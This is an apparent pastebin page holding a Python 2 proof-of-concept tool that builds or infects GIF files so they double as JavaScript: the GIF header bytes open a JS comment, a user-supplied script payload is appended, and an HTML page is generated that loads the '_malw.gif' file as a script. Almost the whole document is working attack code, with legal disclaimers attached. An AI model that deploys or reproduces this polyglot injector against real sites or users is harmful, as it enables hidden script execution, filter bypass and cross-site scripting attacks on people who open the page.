SHOW:
|
|
- or go back to the newest paste.
1 | #!/usr/bin/env python2 | |
2 | #============================================================================================================# | |
3 | #======= Simply injects a JavaScript Payload into a GIF. ====================================================# | |
4 | #======= or it creates a JavaScript Payload as a GIF. ====================================================# | |
5 | #======= The resulting GIF must be a valid (not corrupted) GIF. =============================================# | |
6 | #======= Author: marcoramilli.blogspot.com ==================================================================# | |
7 | #======= Version: PoC (don't even think to use it in development env.) ======================================# | |
8 | #======= Disclaimer: ========================================================================================# | |
9 | #THIS IS NOT PEP3 FORMATTED | |
10 | #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR | |
11 | #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED | |
12 | #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
13 | #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, | |
14 | #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES | |
15 | #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
16 | #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) | |
17 | #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, | |
18 | #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING | |
19 | #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE | |
20 | #POSSIBILITY OF SUCH DAMAGE. | |
21 | #===========================================================================================================# | |
22 | import argparse | |
23 | import os | |
24 | ||
25 | ||
26 | #--------------------------------------------------------- | |
27 | def _hexify(num): | |
28 | """ | |
29 | Converts and formats to hexadecimal | |
30 | """ | |
31 | num = "%x" % num | |
32 | if len(num) % 2: | |
33 | num = '0'+num | |
34 | return num.decode('hex') | |
35 | ||
36 | ||
37 | #--------------------------------------------------------- | |
38 | def _generate_and_write_to_file(payload, fname): | |
39 | """ | |
40 | Generates a fake but valid GIF within scriting | |
41 | """ | |
42 | f = open(fname, "wb") | |
43 | header = (b'\x47\x49\x46\x38\x39\x61' #Signature + Version GIF89a | |
44 | b'\x2F\x2A' #Encoding /* it's a valid Logical Screen Width | |
45 | b'\x0A\x00' #Smal Logical Screen Height | |
46 | b'\x00' #GCTF | |
47 | b'\xFF' #BackgroundColor | |
48 | b'\x00' #Pixel Ratio | |
49 | b'\x2C\x00\x00\x00\x00\x2F\x2A\x0A\x00\x00\x02\x00\x3B' #GlobalColorTable + Blocks | |
50 | b'\x2A\x2F' #Commenting out */ | |
51 | b'\x3D\x31\x3B' # enable the script side by introducing =1; | |
52 | ) | |
53 | trailer = b'\x3B' | |
54 | # I made this explicit, step by step . | |
55 | f.write(header) | |
56 | f.write(payload) | |
57 | f.write(trailer) | |
58 | f.close() | |
59 | return True | |
60 | ||
61 | ||
62 | #--------------------------------------------------------- | |
63 | def _generate_launching_page(f): | |
64 | """ | |
65 | Creates the HTML launching page | |
66 | """ | |
67 | htmlpage =""" | |
68 | <html> | |
69 | <head><title>Opening an image</title> </head> | |
70 | <body> | |
71 | <img src=\"""" + f + """_malw.gif\"\> | |
72 | <script src= \"""" + f + """_malw.gif\"> </script> | |
73 | </body> | |
74 | </html> | |
75 | """ | |
76 | html = open("run.html", "wb") | |
77 | html.write(htmlpage); | |
78 | html.close() | |
79 | return True | |
80 | ||
81 | ||
82 | #--------------------------------------------------------- | |
83 | def _inject_into_file(payload, fname): | |
84 | """ | |
85 | Injects the payload into existing GIF | |
86 | NOTE: if the GIF contains \xFF\x2A and/or \x2A\x5C might caouse issues | |
87 | """ | |
88 | # I know, I can do it all in memory and much more fast. | |
89 | # I wont do it here. | |
90 | with open(fname + "_malw.gif", "w+b") as fout: | |
91 | with open(fname, "rt") as fin: | |
92 | for line in fin: | |
93 | ls1 = line.replace(b'\x2A\x2F', b'\x00\x00') | |
94 | ls2 = ls1.replace(b'\x2F\x2A', b'\x00\x00') | |
95 | fout.write(ls2) | |
96 | fout.seek(6,0) | |
97 | fout.write(b'\x2F\x2A') #/* | |
98 | ||
99 | f = open(fname + "_malw.gif", "a+b") #appending mode | |
100 | f.write(b'\x2A\x2F\x3D\x31\x3B') | |
101 | f.write(payload) | |
102 | f.write(b'\x3B') | |
103 | f.close() | |
104 | return True | |
105 | ||
106 | ||
107 | #--------------------------------------------------------- | |
108 | if __name__ == "__main__": | |
109 | parser = argparse.ArgumentParser() | |
110 | parser.add_argument("filename",help="the gif file name to be generated/or infected") | |
111 | parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"") | |
112 | parser.add_argument("-i", "--inject-to-existing-gif", action="store_true", help="inject into the current gif") | |
113 | args = parser.parse_args() | |
114 | print(""" | |
115 | |======================================================================================================| | |
116 | | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. | | |
117 | | It is the end user's responsibility to obey all applicable local, state and federal laws. | | |
118 | | Authors assume no liability and are not responsible for any misuse or damage caused by this program | | |
119 | |======================================================================================================| | |
120 | """ | |
121 | ) | |
122 | if args.inject_to_existing_gif: | |
123 | _inject_into_file(args.js_payload, args.filename) | |
124 | else: | |
125 | _generate_and_write_to_file(args.js_payload, args.filename) | |
126 | ||
127 | _generate_launching_page(args.filename) | |
128 | print "[+] Finished!" |